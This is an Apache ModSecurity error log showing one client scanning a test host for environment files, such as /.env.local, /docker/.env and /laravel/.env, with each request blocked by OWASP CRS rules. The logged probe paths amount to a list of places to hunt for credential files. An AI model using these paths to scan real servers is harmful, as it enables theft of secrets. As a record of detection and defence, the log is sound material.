[Tue Mar 03 00:28:29.607620 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aaYdHTmDqvvg871HbIU9jgAAAAY"]
[Tue Mar 03 00:28:29.861073 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aaYdHTmDqvvg871HbIU9jwAAAAY"]
[Tue Mar 03 00:28:29.861304 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aaYdHTmDqvvg871HbIU9jwAAAAY"]
[Tue Mar 03 00:28:29.861478 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aaYdHTmDqvvg871HbIU9jwAAAAY"]
[Tue Mar 03 00:28:29.959264 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aaYdHTmDqvvg871HbIU9kAAAAAY"]
[Tue Mar 03 00:28:29.959504 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aaYdHTmDqvvg871HbIU9kAAAAAY"]
[Tue Mar 03 00:28:29.959713 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aaYdHTmDqvvg871HbIU9kAAAAAY"]
[Tue Mar 03 00:28:30.057583 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aaYdHjmDqvvg871HbIU9kQAAAAY"]
[Tue Mar 03 00:28:30.057847 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aaYdHjmDqvvg871HbIU9kQAAAAY"]
[Tue Mar 03 00:28:30.058029 2026] [:error] [pid 2439854] [client 195.178.110.33:56616] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aaYdHjmDqvvg871HbIU9kQAAAAY"]
[Tue Mar 03 00:28:33.560302 2026] [:error] [pid 2439851] [client 195.178.110.33:56632] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aaYdIXKpPFQwL8r802j_egAAAAI"]
[Tue Mar 03 00:28:33.560579 2026] [:error] [pid 2439851] [client 195.178.110.33:56632] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aaYdIXKpPFQwL8r802j_egAAAAI"]
[Tue Mar 03 00:28:33.560757 2026] [:error] [pid 2439851] [client 195.178.110.33:56632] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aaYdIXKpPFQwL8r802j_egAAAAI"]
[Tue Mar 03 00:28:33.763552 2026] [:error] [pid 2439851] [client 195.178.110.33:56632] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aaYdIXKpPFQwL8r802j_ewAAAAI"]
[Tue Mar 03 00:28:33.763817 2026] [:error] [pid 2439851] [client 195.178.110.33:56632] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aaYdIXKpPFQwL8r802j_ewAAAAI"]
[Tue Mar 03 00:28:33.764006 2026] [:error] [pid 2439851] [client 195.178.110.33:56632] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aaYdIXKpPFQwL8r802j_ewAAAAI"]
[Tue Mar 03 00:28:34.437315 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aaYdIuruS4pGkRBADB1TmgAAAAM"]
[Tue Mar 03 00:28:34.437545 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aaYdIuruS4pGkRBADB1TmgAAAAM"]
[Tue Mar 03 00:28:34.437715 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aaYdIuruS4pGkRBADB1TmgAAAAM"]
[Tue Mar 03 00:28:34.606188 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aaYdIuruS4pGkRBADB1TmwAAAAM"]
[Tue Mar 03 00:28:34.606444 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aaYdIuruS4pGkRBADB1TmwAAAAM"]
[Tue Mar 03 00:28:34.606616 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aaYdIuruS4pGkRBADB1TmwAAAAM"]
[Tue Mar 03 00:28:34.858559 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aaYdIuruS4pGkRBADB1TnAAAAAM"]
[Tue Mar 03 00:28:34.858791 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aaYdIuruS4pGkRBADB1TnAAAAAM"]
[Tue Mar 03 00:28:34.858967 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aaYdIuruS4pGkRBADB1TnAAAAAM"]
[Tue Mar 03 00:28:35.552549 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aaYdI-ruS4pGkRBADB1TnQAAAAM"]
[Tue Mar 03 00:28:35.552782 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aaYdI-ruS4pGkRBADB1TnQAAAAM"]
[Tue Mar 03 00:28:35.552965 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aaYdI-ruS4pGkRBADB1TnQAAAAM"]
[Tue Mar 03 00:28:36.326641 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aaYdJOruS4pGkRBADB1TngAAAAM"]
[Tue Mar 03 00:28:36.326958 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aaYdJOruS4pGkRBADB1TngAAAAM"]
[Tue Mar 03 00:28:36.327163 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aaYdJOruS4pGkRBADB1TngAAAAM"]
[Tue Mar 03 00:28:37.409419 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aaYdJeruS4pGkRBADB1TowAAAAM"]
[Tue Mar 03 00:28:37.409689 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aaYdJeruS4pGkRBADB1TowAAAAM"]
[Tue Mar 03 00:28:37.409860 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aaYdJeruS4pGkRBADB1TowAAAAM"]
[Tue Mar 03 00:28:37.647830 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aaYdJeruS4pGkRBADB1TpAAAAAM"]
[Tue Mar 03 00:28:37.648064 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aaYdJeruS4pGkRBADB1TpAAAAAM"]
[Tue Mar 03 00:28:37.648266 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aaYdJeruS4pGkRBADB1TpAAAAAM"]
[Tue Mar 03 00:28:37.841645 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aaYdJeruS4pGkRBADB1TpQAAAAM"]
[Tue Mar 03 00:28:37.841882 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aaYdJeruS4pGkRBADB1TpQAAAAM"]
[Tue Mar 03 00:28:37.842063 2026] [:error] [pid 2439852] [client 195.178.110.33:56634] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aaYdJeruS4pGkRBADB1TpQAAAAM"]
